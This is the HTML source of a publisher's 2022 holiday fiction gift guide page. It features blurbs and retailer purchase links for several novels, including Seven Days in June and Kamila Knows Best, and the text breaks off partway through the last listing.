<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 38.75 22.14" role="img" aria-labelledby="titlet-arrow-2024577456  desc-arrow-3707597853">
	<title id="titlet-arrow-2024577456">Arrow Icon</title>
	<desc id="desc-arrow-3707597853">Arrow icon</desc>
	<path role="presentation" d="M38,17.45h0L21.37.85h0a2.76,2.76,0,0,0-2-.85h0a2.76,2.76,0,0,0-2,.85h0L.76,17.45h0a2.77,2.77,0,1,0,4.1,3.72l14.5-14.5L34.06,21.37h0A2.77,2.77,0,0,0,38,17.45Z"/></svg>
</span></span><ul id="site-header__sub-menu-1659823226" class="site-header__sub-menu sub-menu" data-toggle-element="site-header__sub-menu-1659823226"><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/imprint/balance/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Balance">Balance</a></span></li><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.grandcentralpublishing.com/imprint/grand-central-publishing/forever/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Forever / Forever Yours">Forever / Forever Yours</a></span></li><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.legacylitbooks.com/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Legacy Lit">Legacy Lit</a></span></li><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.grandcentralpublishing.com/imprint/grand-central-publishing/twelve/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Twelve">Twelve</a></span></li></ul>
</li><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.grandcentralpublishing.com/imprint/grand-central-publishing/page/gcp-clubcar/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="GCP Club Car">GCP Club Car</a></span></li><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.grandcentralpublishing.com/imprint/grand-central-publishing/page/grand-central-publishing-pop-x-books/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="GCP Pop x Books">GCP Pop x Books</a></span></li><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.grandcentralpublishing.com/landing-page/gcps-sizzling-summer-reads/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Sizzling Summer Reads">Sizzling Summer Reads</a></span></li><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="HBG Home">HBG Home</a></span></li></ul></nav></div>	
<div class="site-search">
	<form id="global-hbg-search" class="site-search__form" name="search-form" action="https://www.grandcentralpublishing.com/">
		<label class="site-search__label" for="search-form-6361c4e1b77fb">Search</label>
		<span class="site-search_background"></span>
		<input class="site-search__input" type="search" id="search-form-6361c4e1b77fb" value="" placeholder="Search" name="s" alt="search input field">
		<button class="site-search__button" aria-label="Search">
			
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 38.68 38.68" role="img" aria-labelledby="title-search-icon-1476568057  desc-search-icon-1215543070">
	<title id="title-search-icon-1476568057">Search</title>
	<desc id="desc-search-icon-1215543070">magnifying glass graphic</desc>
	<path d="M37.62,32.49,27,21.86A14.54,14.54,0,1,0,21.86,27L32.49,37.62a3.63,3.63,0,1,0,5.13-5.13ZM14.5,25.38A10.88,10.88,0,1,1,25.38,14.5,10.88,10.88,0,0,1,14.5,25.38Z"/></svg>
		</button>
	</form>
</div>
</div>
</header>

<!-- Popup Modal -->
<div class="modal-popup modal-site-popup modal-imprint-popup modal fade" id="newsletter_popup" tabindex="-1" role="dialog" aria-labelledby="myModalLabel">
  <div class="modal-dialog" role="document">
	<div class="modal-content">
	  <div class="modal-header">
		<button type="button" class="modal-close" data-dismiss="modal" aria-label="Close"><span aria-hidden="true">&times;</span></button>
		<h4 class="modal-title"></h4>
	  </div>
			<div class="signup module">
	<div class="module__content">
	<div class="signup__content">
		<p class="newsletter-text">Don’t miss news from Grand Central Publishing</p>
		<div class="signup__form-wrapper">
			<form class="signup__form">
				<label for="email_address_input" class="screen-reader-text">Don’t miss news from Grand Central Publishing</label>
				<input id="email_address_input" type="email" name="email_address" class="hachette-input hachette-email" placeholder="Your email address" />
									<input type="hidden" name="list_id" class="hachette-input" value="2061378a8c" />
												<button class="newsletter-submit"
					data-type="click-event" data-category="Form Newsletter" data-action="Submit Form" data-label="Submit Newsletter"
				>
					Sign Up				</button>
			</form>
		</div>
	</div>
		<p class="signup__legal">
			By clicking ‘Sign Up,’ I acknowledge that I have read and agree to Hachette Book Group’s 			<a href="https://www.grandcentralpublishing.com/terms-and-policies/privacy-policy/">Privacy Policy</a>
			 and 			<a href="https://www.grandcentralpublishing.com/terms-and-policies/terms-of-use/">Terms of Use</a>
		</p>
	</div>
</div>
	</div>
  </div>
</div>

<!-- Cart -->
<section class="drawer" id="flyout-cart" data-drawer-target aria-expanded="false">
	<div class="drawer__overlay" data-drawer-close tabindex="-1"></div>
	<div class="drawer__wrapper">
			<div class="drawer__header">
					<div class="drawer__title"><h2>Shopping Cart</h2></div>
					<button class="drawer__close" data-drawer-close aria-label="Close Cart">
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 320 512"><!--! Font Awesome Pro 6.0.0 by @fontawesome - https://fontawesome.com License - https://fontawesome.com/license (Commercial License) Copyright 2022 Fonticons, Inc. --><path d="M310.6 361.4c12.5 12.5 12.5 32.75 0 45.25C304.4 412.9 296.2 416 288 416s-16.38-3.125-22.62-9.375L160 301.3L54.63 406.6C48.38 412.9 40.19 416 32 416S15.63 412.9 9.375 406.6c-12.5-12.5-12.5-32.75 0-45.25l105.4-105.4L9.375 150.6c-12.5-12.5-12.5-32.75 0-45.25s32.75-12.5 45.25 0L160 210.8l105.4-105.4c12.5-12.5 32.75-12.5 45.25 0s12.5 32.75 0 45.25l-105.4 105.4L310.6 361.4z"/></svg>
</button>
			</div>
			<div class="drawer__content">
				<div id="shopping-cart-component" class="shopping-cart-component"></div>
			</div>
	</div>
</section>
			<div id="content" class="site__content">
				
<main class="">
	<article class="article-content__wrapper">
		<div class="article-content__main-body">
			<header class="post__header">
				<h1>2022 Holiday Gift Guide: Fiction</h1>
			</header>

			
							<header class="post__meta">
					<span class="post__byline">
						Grand Central Publishing					</span>
				</header>
			
				<div class="post__content">
					<p><img class="aligncenter  wp-image-1276664" src="https://i0.wp.com/www.hachettebookgroup.com/wp-content/uploads/2022/10/10.png?resize=662%2C347&#038;ssl=1" alt="" width="662" height="347" srcset="https://www.grandcentralpublishing.com/wp-content/uploads/2022/10/10.png?w=1200 1200w, https://www.grandcentralpublishing.com/wp-content/uploads/2022/10/10.png?w=300 300w, https://www.grandcentralpublishing.com/wp-content/uploads/2022/10/10.png?w=768 768w, https://www.grandcentralpublishing.com/wp-content/uploads/2022/10/10.png?w=1024 1024w, https://www.grandcentralpublishing.com/wp-content/uploads/2022/10/10.png?w=450 450w, https://www.grandcentralpublishing.com/wp-content/uploads/2022/10/10.png?w=480 480w, https://www.grandcentralpublishing.com/wp-content/uploads/2022/10/10.png?w=190 190w, https://www.grandcentralpublishing.com/wp-content/uploads/2022/10/10.png?w=160 160w, https://www.grandcentralpublishing.com/wp-content/uploads/2022/10/10.png?w=180 180w" sizes="(max-width: 662px) 100vw, 662px" data-recalc-dims="1" /></p>
<p>&nbsp;</p>
<p>Thought-provoking cli-fi, steamy romance, feel-good fiction and more &#8211; these novels will keep book clubs talking well into the new year.</p>
<p>&nbsp;</p>

<div class="featured-title v2" id="title-9781538719091">
	<div class="featured-title__cover">
		<a href="https://www.grandcentralpublishing.com/titles/tia-williams/seven-days-in-june/9781538719091/" alt="Seven Days in June">
			<img width="187" height="285" src="" class="lazyload orientation-portrait" alt="Seven Days in June" loading="lazy" data-src="https://www.grandcentralpublishing.com/wp-content/uploads/2022/06/9781538719091.jpg?fit=187%2C285" />					</a>
	</div>

	<div class="featured-title__description">
		<div class="featured-title__description-text">
			<div class="featured-title__heading">
				<header class="featured-title__header">
					<h3 class="featured-title__name">
						<a href="https://www.grandcentralpublishing.com/titles/tia-williams/seven-days-in-june/9781538719091/" alt="Seven Days in June">
							Seven Days in June						</a>
					</h3>

																		<h4 class="title-header__byline">
								by <a href="https://www.grandcentralpublishing.com/contributor/tia-williams/" class="title-header__author"><span>Tia Williams</span></a>							</h4>
															</header>

							</div>

							<div class="featured-title__summary">
					<p class="featured-title__summary-inner"><DIV><P><B>The instant <I>New York Times</I> bestseller and Reese Witherspoon book club pick is&#160;&quot;a heady combination of book love and between-the-sheets love.&rdquo; (Ruth Ware)</B><BR /><BR /><B>&ldquo;Tia Williams&rsquo;s book is a smart, sexy testament to Black joy, to the well of strength from which women draw, and to tragic romances that mature into second chances.&#160;I absolutely loved it.&rdquo;<BR /> &mdash;JODI PICOULT, #1 <I>New York Times</I> bestselling author of <I>The Book of Two Ways</I> and <I>Small Great Things</I></B><BR /><BR /><I>Seven days to fall in love, fifteen years to forget, and seven days to get it all back again...</I><BR /><BR /> Eva Mercy is a single mom and bestselling erotica writer who is feeling pressed from all sides. Shane Hall is a reclusive, enigmatic, award-winning novelist, who, to everyone&rsquo;s surprise, shows up in New York.<BR /><BR /> When Shane and Eva meet unexpectedly at a literary event, sparks fly, raising not only their buried traumas, but the eyebrows of the Black literati. What no one knows is that fifteen years earlier, teenage Eva and Shane spent one crazy, torrid week madly in love. While they may be pretending not to know each other, they can&rsquo;t deny their chemistry&mdash;or the fact that they&rsquo;ve been secretly writing to each other in their books through the years.<BR /><BR /> Over the next seven days, amidst a steamy Brooklyn summer, Eva and Shane reconnect&mdash;but Eva&rsquo;s wary of the man who broke her heart, and wants him out of the city so her life can return to normal. Before Shane disappears though, she needs a few questions answered...<BR /><BR /> With its keen observations of creative life in America today, as well as the joys and complications of being a mother and a daughter, <I>Seven Days</I><I>in June</I> is a hilarious, romantic, and sexy-as-hell story of two writers discovering their second chance at love.<BR /><BR /><B>A Best Book of the Year:&#160;<I>NPR &bull; Kirkus &bull; Marie Claire&#160;&bull; PopSugar &bull;&#160;</I>New York Public Library&#160;<I>&bull;&#160;Bustle &bull; Reader&rsquo;s Digest&#160;&bull; Literary Hub</I><BR /> A Best Book of the Summer:&#160;<I>Harper&rsquo;s Bazaar &bull; Oprah Daily &bull; Shondaland &bull; The Los Angeles Times &bull; CBS News &bull; PureWow &bull; Good Housekeeping &bull; BuzzFeed &bull; theSkimm</I></B><BR /><B>A Best Romance of 2021:&#160;<I>The Washington Post &bull; USA Today &bull; Vulture &bull; Goodreads &bull; BookPage &bull;&#160;BuzzFeed &bull; Happy Mag</I></B></P></DIV></p>
				</div>
					</div>

		<div class="title-header__dropdown dropdown dropdown--inverse btn-group">
			<button class="btn btn-default btn-default dropdown-toggle" data-toggle="dropdown" aria-haspopup="true" aria-expanded="false">
			<span class="dropdown-toggle__button-text">Trade Paperback</span>
			<span class="icon-arrow dropdown__arrow">
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 38.75 22.14" role="img" aria-labelledby="titlet-arrow-2387445341  desc-arrow-215066819">
	<title id="titlet-arrow-2387445341">Arrow Icon</title>
	<desc id="desc-arrow-215066819">Arrow icon</desc>
	<path role="presentation" d="M38,17.45h0L21.37.85h0a2.76,2.76,0,0,0-2-.85h0a2.76,2.76,0,0,0-2,.85h0L.76,17.45h0a2.77,2.77,0,1,0,4.1,3.72l14.5-14.5L34.06,21.37h0A2.77,2.77,0,0,0,38,17.45Z"/></svg>
</span>
		</button>
		<ul class="dropdown-menu">
							<li>
					<a href="https://www.grandcentralpublishing.com/titles/tia-williams/seven-days-in-june/9781538719114/">
						ebook					</a>
				</li>
							<li>
					<a href="https://www.grandcentralpublishing.com/titles/tia-williams/seven-days-in-june/9781538719107/">
						Hardcover					</a>
				</li>
							<li>
					<a href="https://www.grandcentralpublishing.com/titles/tia-williams/seven-days-in-june/9781549104855/">
						Audiobook Download <span class="title-header__dropdown-format">Unabridged</span>					</a>
				</li>
					</ul>
	</div>
<div class="dropdown dropdown--default btn-group">
	<button class="btn btn-default btn-default dropdown-toggle" data-toggle="dropdown" aria-haspopup="true" aria-expanded="false">
		<span class="dropdown-toggle__button-text">Buy Book</span>
		<span class="icon-arrow dropdown__arrow">
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 38.75 22.14" role="img" aria-labelledby="titlet-arrow-1713729650  desc-arrow-2466501551">
	<title id="titlet-arrow-1713729650">Arrow Icon</title>
	<desc id="desc-arrow-2466501551">Arrow icon</desc>
	<path role="presentation" d="M38,17.45h0L21.37.85h0a2.76,2.76,0,0,0-2-.85h0a2.76,2.76,0,0,0-2,.85h0L.76,17.45h0a2.77,2.77,0,1,0,4.1,3.72l14.5-14.5L34.06,21.37h0A2.77,2.77,0,0,0,38,17.45Z"/></svg>
</span>
	</button>
	<ul class="dropdown-menu">
					<li>
				<a target="_blank" href="http://www.amazon.com/gp/product/1538719096?tag=hacboogrosit-20"
					data-type="link-event" data-category="Retailer Button" data-action="Click to Retail"
					data-label="Amazon"
				>
					Amazon				</a>
			</li>
					<li>
				<a target="_blank" href="http://www.anrdoezrs.net/links/8040641/type/dlg/http://www.barnesandnoble.com/s/9781538719091"
					data-type="link-event" data-category="Retailer Button" data-action="Click to Retail"
					data-label="Barnes &amp; Noble"
				>
					Barnes &amp; Noble				</a>
			</li>
					<li>
				<a target="_blank" href="http://www.anrdoezrs.net/links/8040641/type/dlg/http://www.booksamillion.com/p/9781538719091"
					data-type="link-event" data-category="Retailer Button" data-action="Click to Retail"
					data-label="Books-A-Million"
				>
					Books-A-Million				</a>
			</li>
					<li>
				<a target="_blank" href="http://www.indiebound.org/book/9781538719091"
					data-type="link-event" data-category="Retailer Button" data-action="Click to Retail"
					data-label="Indiebound"
				>
					Indiebound				</a>
			</li>
					<li>
				<a target="_blank" href="https://bookshop.org/a/2344/9781538719091"
					data-type="link-event" data-category="Retailer Button" data-action="Click to Retail"
					data-label="Bookshop"
				>
					Bookshop				</a>
			</li>
					<li>
				<a target="_blank" href="https://www.hudsonbooksellers.com/book/9781538719091/aff/HBGUSA"
					data-type="link-event" data-category="Retailer Button" data-action="Click to Retail"
					data-label="Hudson Booksellers"
				>
					Hudson Booksellers				</a>
			</li>
					<li>
				<a target="_blank" href="http://www.powells.com/book/-9781538719091"
					data-type="link-event" data-category="Retailer Button" data-action="Click to Retail"
					data-label="Powell&#039;s"
				>
					Powell&#039;s				</a>
			</li>
					<li>
				<a target="_blank" href="http://www.target.com/s?searchTerm=9781538719091"
					data-type="link-event" data-category="Retailer Button" data-action="Click to Retail"
					data-label="Target"
				>
					Target				</a>
			</li>
					<li>
				<a target="_blank" href="http://www.walmart.com/search/search-ng.do?q=9781538719091"
					data-type="link-event" data-category="Retailer Button" data-action="Click to Retail"
					data-label="Walmart"
				>
					Walmart				</a>
			</li>
			</ul>
</div>
	</div>
</div>


<div class="featured-title v2" id="title-9781538754849">
	<div class="featured-title__cover">
		<a href="https://www.grandcentralpublishing.com/titles/anita-kelly/love-other-disasters/9781538754849/" alt="Love &amp; Other Disasters">
			<img width="187" height="285" src="" class="lazyload orientation-portrait" alt="Love &amp; Other Disasters" loading="lazy" data-src="https://www.grandcentralpublishing.com/wp-content/uploads/2022/01/9781538754849.jpg?fit=187%2C285" />					</a>
	</div>

	<div class="featured-title__description">
		<div class="featured-title__description-text">
			<div class="featured-title__heading">
				<header class="featured-title__header">
					<h3 class="featured-title__name">
						<a href="https://www.grandcentralpublishing.com/titles/anita-kelly/love-other-disasters/9781538754849/" alt="Love &amp; Other Disasters">
							Love &amp; Other Disasters						</a>
					</h3>

																		<h4 class="title-header__byline">
								by <a href="https://www.grandcentralpublishing.com/contributor/anita-kelly/" class="title-header__author"><span>Anita Kelly</span></a>							</h4>
															</header>

							</div>

							<div class="featured-title__summary">
					<p class="featured-title__summary-inner"><B>The first openly nonbinary contestant on America&rsquo;s favorite cooking show falls for their clumsy competitor in this delicious romantic comedy debut that <I>USA Today</I> hailed as &ldquo;an essential read.&rdquo;</B><BR /><BR />Recently divorced and on the verge of bankruptcy, Dahlia Woodson is ready to reinvent herself on the popular reality competition show Chef&rsquo;s Special. Too bad the first memorable move she makes is falling flat on her face, sending fish tacos flying&mdash;not quite the fresh start she was hoping for. Still, she&#039;s focused on winning, until she meets someone she might want a future with more than she needs the prize money.&#160;<BR /><BR />After announcing their pronouns on national television, London Parker has enough on their mind without worrying about the klutzy competitor stationed in front of them. They&rsquo;re there to prove the trolls&mdash;including a fellow contestant and their dad&mdash;wrong, and falling in love was never part of the plan.<BR /><BR />As London and Dahlia get closer, reality starts to fall away. Goodbye, guilt about divorce, anxiety about uncertain futures, and stress from transphobia. Hello, hilarious shenanigans on set, wedding crashing, and spontaneous dips into the Pacific. But as the finale draws near, Dahlia and London&rsquo;s steamy relationship starts to feel the heat both in and outside the kitchen&mdash;and they must figure out if they have the right ingredients for a happily ever after.</p>
				</div>
					</div>

		<div class="title-header__dropdown dropdown dropdown--inverse btn-group">
			<button class="btn btn-default btn-default dropdown-toggle" data-toggle="dropdown" aria-haspopup="true" aria-expanded="false">
			<span class="dropdown-toggle__button-text">Trade Paperback</span>
			<span class="icon-arrow dropdown__arrow">
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 38.75 22.14" role="img" aria-labelledby="titlet-arrow-3720240581  desc-arrow-1107772940">
	<title id="titlet-arrow-3720240581">Arrow Icon</title>
	<desc id="desc-arrow-1107772940">Arrow icon</desc>
	<path role="presentation" d="M38,17.45h0L21.37.85h0a2.76,2.76,0,0,0-2-.85h0a2.76,2.76,0,0,0-2,.85h0L.76,17.45h0a2.77,2.77,0,1,0,4.1,3.72l14.5-14.5L34.06,21.37h0A2.77,2.77,0,0,0,38,17.45Z"/></svg>
</span>
		</button>
		<ul class="dropdown-menu">
							<li>
					<a href="https://www.grandcentralpublishing.com/titles/anita-kelly/love-other-disasters/9781538754856/">
						ebook					</a>
				</li>
							<li>
					<a href="https://www.grandcentralpublishing.com/titles/anita-kelly/love-other-disasters/9781549166068/">
						Audiobook Download <span class="title-header__dropdown-format">Unabridged</span>					</a>
				</li>
					</ul>
	</div>
<div class="dropdown dropdown--default btn-group">
	<button class="btn btn-default btn-default dropdown-toggle" data-toggle="dropdown" aria-haspopup="true" aria-expanded="false">
		<span class="dropdown-toggle__button-text">Buy Book</span>
		<span class="icon-arrow dropdown__arrow">
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 38.75 22.14" role="img" aria-labelledby="titlet-arrow-3322754514  desc-arrow-2184825982">
	<title id="titlet-arrow-3322754514">Arrow Icon</title>
	<desc id="desc-arrow-2184825982">Arrow icon</desc>
	<path role="presentation" d="M38,17.45h0L21.37.85h0a2.76,2.76,0,0,0-2-.85h0a2.76,2.76,0,0,0-2,.85h0L.76,17.45h0a2.77,2.77,0,1,0,4.1,3.72l14.5-14.5L34.06,21.37h0A2.77,2.77,0,0,0,38,17.45Z"/></svg>
</span>
	</button>
	<ul class="dropdown-menu">
					<li>
				<a target="_blank" href="http://www.amazon.com/gp/product/1538754843?tag=hacboogrosit-20"
					data-type="link-event" data-category="Retailer Button" data-action="Click to Retail"
					data-label="Amazon"
				>
					Amazon				</a>
			</li>
					<li>
				<a target="_blank" href="http://www.anrdoezrs.net/links/8040641/type/dlg/http://www.barnesandnoble.com/s/9781538754849"
					data-type="link-event" data-category="Retailer Button" data-action="Click to Retail"
					data-label="Barnes &amp; Noble"
				>
					Barnes &amp; Noble				</a>
			</li>
					<li>
				<a target="_blank" href="http://www.anrdoezrs.net/links/8040641/type/dlg/http://www.booksamillion.com/p/9781538754849"
					data-type="link-event" data-category="Retailer Button" data-action="Click to Retail"
					data-label="Books-A-Million"
				>
					Books-A-Million				</a>
			</li>
					<li>
				<a target="_blank" href="http://www.indiebound.org/book/9781538754849"
					data-type="link-event" data-category="Retailer Button" data-action="Click to Retail"
					data-label="Indiebound"
				>
					Indiebound				</a>
			</li>
					<li>
				<a target="_blank" href="https://bookshop.org/a/2344/9781538754849"
					data-type="link-event" data-category="Retailer Button" data-action="Click to Retail"
					data-label="Bookshop"
				>
					Bookshop				</a>
			</li>
					<li>
				<a target="_blank" href="https://www.hudsonbooksellers.com/book/9781538754849/aff/HBGUSA"
					data-type="link-event" data-category="Retailer Button" data-action="Click to Retail"
					data-label="Hudson Booksellers"
				>
					Hudson Booksellers				</a>
			</li>
					<li>
				<a target="_blank" href="http://www.powells.com/book/-9781538754849"
					data-type="link-event" data-category="Retailer Button" data-action="Click to Retail"
					data-label="Powell&#039;s"
				>
					Powell&#039;s				</a>
			</li>
					<li>
				<a target="_blank" href="http://www.target.com/s?searchTerm=9781538754849"
					data-type="link-event" data-category="Retailer Button" data-action="Click to Retail"
					data-label="Target"
				>
					Target				</a>
			</li>
					<li>
				<a target="_blank" href="http://www.walmart.com/search/search-ng.do?q=9781538754849"
					data-type="link-event" data-category="Retailer Button" data-action="Click to Retail"
					data-label="Walmart"
				>
					Walmart				</a>
			</li>
			</ul>
</div>
	</div>
</div>


<div class="featured-title v2" id="title-9781538709948">
	<div class="featured-title__cover">
		<a href="https://www.grandcentralpublishing.com/titles/claire-alexander/meredith-alone/9781538709948/" alt="Meredith, Alone">
			<img width="188" height="285" src="" class="lazyload orientation-portrait" alt="Meredith, Alone" loading="lazy" data-src="https://www.grandcentralpublishing.com/wp-content/uploads/2022/05/9781538709948-1.jpg?fit=188%2C285" />					</a>
	</div>

	<div class="featured-title__description">
		<div class="featured-title__description-text">
			<div class="featured-title__heading">
				<header class="featured-title__header">
					<h3 class="featured-title__name">
						<a href="https://www.grandcentralpublishing.com/titles/claire-alexander/meredith-alone/9781538709948/" alt="Meredith, Alone">
							Meredith, Alone						</a>
					</h3>

																		<h4 class="title-header__byline">
								by <a href="https://www.grandcentralpublishing.com/contributor/claire-alexander/" class="title-header__author"><span>Claire Alexander</span></a>							</h4>
															</header>

							</div>

							<div class="featured-title__summary">
					<p class="featured-title__summary-inner"><B>&ldquo;The brilliant author of this brilliant book&rdquo; will have you laughing and crying as Meredith, after spending three years inside her house, figures out how to rejoin the world one step at a time (Gillian McAllister, author of the Reese&rsquo;s Book Club <I>Wrong Place Wrong Time</I>).&#160;</B><BR /><BR /> She has a full-time remote job and her rescue cat Fred. Her best friend Sadie visits with her two children.&#160; There&#039;s her online support group, her jigsaw puzzles and favorite recipes, her beloved Emily Dickinson poems.&#160; Also keeping her company are treacherous memories of an unstable childhood and a traumatic event that had sent her reeling.&#160;&#160;<BR /><BR /> But something&#039;s about to change. First, two new friends burst into her life.&#160; Then her long-estranged sister gets in touch.&#160; Suddenly her carefully curated home is no longer a space to hide.&#160; Whether Meredith likes it or not, the world&#160; is coming to her door...<BR /><BR /> &#160;</p>
				</div>
					</div>

		<div class="title-header__dropdown dropdown dropdown--inverse btn-group">
			<button class="btn btn-default btn-default dropdown-toggle" data-toggle="dropdown" aria-haspopup="true" aria-expanded="false">
			<span class="dropdown-toggle__button-text">Hardcover</span>
			<span class="icon-arrow dropdown__arrow">
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 38.75 22.14" role="img" aria-labelledby="titlet-arrow-536613790  desc-arrow-3528150153">
	<title id="titlet-arrow-536613790">Arrow Icon</title>
	<desc id="desc-arrow-3528150153">Arrow icon</desc>
	<path role="presentation" d="M38,17.45h0L21.37.85h0a2.76,2.76,0,0,0-2-.85h0a2.76,2.76,0,0,0-2,.85h0L.76,17.45h0a2.77,2.77,0,1,0,4.1,3.72l14.5-14.5L34.06,21.37h0A2.77,2.77,0,0,0,38,17.45Z"/></svg>
</span>
		</button>
		<ul class="dropdown-menu">
							<li>
					<a href="https://www.grandcentralpublishing.com/titles/claire-alexander/meredith-alone/9781538709962/">
						ebook					</a>
				</li>
							<li>
					<a href="https://www.grandcentralpublishing.com/titles/claire-alexander/meredith-alone/9781668611265/">
						Audiobook Download <span class="title-header__dropdown-format">Unabridged</span>					</a>
				</li>
					</ul>
	</div>
<div class="dropdown dropdown--default btn-group">
	<button class="btn btn-default btn-default dropdown-toggle" data-toggle="dropdown" aria-haspopup="true" aria-expanded="false">
		<span class="dropdown-toggle__button-text">Buy Book</span>
		<span class="icon-arrow dropdown__arrow">
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 38.75 22.14" role="img" aria-labelledby="titlet-arrow-1425880044  desc-arrow-1953150668">
	<title id="titlet-arrow-1425880044">Arrow Icon</title>
	<desc id="desc-arrow-1953150668">Arrow icon</desc>
	<path role="presentation" d="M38,17.45h0L21.37.85h0a2.76,2.76,0,0,0-2-.85h0a2.76,2.76,0,0,0-2,.85h0L.76,17.45h0a2.77,2.77,0,1,0,4.1,3.72l14.5-14.5L34.06,21.37h0A2.77,2.77,0,0,0,38,17.45Z"/></svg>
</span>
	</button>
	<ul class="dropdown-menu">
					<li>
				<a target="_blank" href="http://www.amazon.com/gp/product/1538709945?tag=hacboogrosit-20"
					data-type="link-event" data-category="Retailer Button" data-action="Click to Retail"
					data-label="Amazon"
				>
					Amazon				</a>
			</li>
					<li>
				<a target="_blank" href="http://www.anrdoezrs.net/links/8040641/type/dlg/http://www.barnesandnoble.com/s/9781538709948"
					data-type="link-event" data-category="Retailer Button" data-action="Click to Retail"
					data-label="Barnes &amp; Noble"
				>
					Barnes &amp; Noble				</a>
			</li>
					<li>
				<a target="_blank" href="http://www.anrdoezrs.net/links/8040641/type/dlg/http://www.booksamillion.com/p/9781538709948"
					data-type="link-event" data-category="Retailer Button" data-action="Click to Retail"
					data-label="Books-A-Million"
				>
					Books-A-Million				</a>
			</li>
					<li>
				<a target="_blank" href="http://www.indiebound.org/book/9781538709948"
					data-type="link-event" data-category="Retailer Button" data-action="Click to Retail"
					data-label="Indiebound"
				>
					Indiebound				</a>
			</li>
					<li>
				<a target="_blank" href="https://bookshop.org/a/2344/9781538709948"
					data-type="link-event" data-category="Retailer Button" data-action="Click to Retail"
					data-label="Bookshop"
				>
					Bookshop				</a>
			</li>
					<li>
				<a target="_blank" href="https://www.hudsonbooksellers.com/book/9781538709948/aff/HBGUSA"
					data-type="link-event" data-category="Retailer Button" data-action="Click to Retail"
					data-label="Hudson Booksellers"
				>
					Hudson Booksellers				</a>
			</li>
					<li>
				<a target="_blank" href="http://www.powells.com/book/-9781538709948"
					data-type="link-event" data-category="Retailer Button" data-action="Click to Retail"
					data-label="Powell&#039;s"
				>
					Powell&#039;s				</a>
			</li>
					<li>
				<a target="_blank" href="http://www.target.com/s?searchTerm=9781538709948"
					data-type="link-event" data-category="Retailer Button" data-action="Click to Retail"
					data-label="Target"
				>
					Target				</a>
			</li>
					<li>
				<a target="_blank" href="http://www.walmart.com/search/search-ng.do?q=9781538709948"
					data-type="link-event" data-category="Retailer Button" data-action="Click to Retail"
					data-label="Walmart"
				>
					Walmart				</a>
			</li>
			</ul>
</div>
	</div>
</div>


<div class="featured-title v2" id="title-9781538735008">
	<div class="featured-title__cover">
		<a href="https://www.grandcentralpublishing.com/titles/farah-heron/kamila-knows-best/9781538735008/" alt="Kamila Knows Best">
			<img width="187" height="285" src="" class="lazyload orientation-portrait" alt="Kamila Knows Best" loading="lazy" data-src="https://www.grandcentralpublishing.com/wp-content/uploads/2022/03/9781538735008.jpg?fit=187%2C285" />					</a>
	</div>

	<div class="featured-title__description">
		<div class="featured-title__description-text">
			<div class="featured-title__heading">
				<header class="featured-title__header">
					<h3 class="featured-title__name">
						<a href="https://www.grandcentralpublishing.com/titles/farah-heron/kamila-knows-best/9781538735008/" alt="Kamila Knows Best">
							Kamila Knows Best						</a>
					</h3>

																		<h4 class="title-header__byline">
								by <a href="https://www.grandcentralpublishing.com/contributor/farah-heron/" class="title-header__author"><span>Farah Heron</span></a>							</h4>
															</header>

							</div>

							<div class="featured-title__summary">
					<p class="featured-title__summary-inner"><B>Jane Austen&#039;s <I>Emma </I>goes Bollywoood in&#160;this delightful retelling from the highly acclaimed author of <I>Accidentally Engaged, </I>perfect for fans of Abby Jimenez and Jasmine Guillory<I>.</I></B><P>Kamila Hussain&rsquo;s life might not be perfect, but, <I>whew</I>, it&rsquo;s close. She lives a life of comfort, filled with her elaborate Bollywood movie parties, a dog with more Instagram followers than most reality stars, a job she loves, and an endless array of friends who clearly need her help finding love. In fact, Kamila is so busy with her friends&rsquo; love lives, she&rsquo;s hardly given any thought to her <I>own </I>. . .</P><P>Fortunately, Kamila has Rohan Nasser. A longtime friend of the family, he&rsquo;s hugely successful, with the deliciously lean, firm body of a rock climber. Only lately, Kamila&rsquo;s &ldquo;harmless flirting&rdquo; with Rohan is making her insides do a little bhangra dance.</P><P>But between planning the local shelter&rsquo;s puppy prom, throwing a huge work event, and proving to everyone that she&rsquo;s got it all figured out, Kamila isn&rsquo;t letting herself get distracted&mdash;until her secret nemesis returns to town with an eye for Rohan. Suddenly, it seems like the more Kamila tries to plan, the more things are starting to unravel&mdash;and her perfectly ordered life is about to be turned upside down.<BR />&#160;</P><ul><li><B>Bookpage&rsquo;s Most Anticipated Romance Novels of 2022</B></li></ul></p>
				</div>
					</div>

		<div class="title-header__dropdown dropdown dropdown--inverse btn-group">
			<button class="btn btn-default btn-default dropdown-toggle" data-toggle="dropdown" aria-haspopup="true" aria-expanded="false">
			<span class="dropdown-toggle__button-text">Trade Paperback</span>
			<span class="icon-arrow dropdown__arrow">
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 38.75 22.14" role="img" aria-labelledby="titlet-arrow-682728056  desc-arrow-737706247">
	<title id="titlet-arrow-682728056">Arrow Icon</title>
	<desc id="desc-arrow-737706247">Arrow icon</desc>
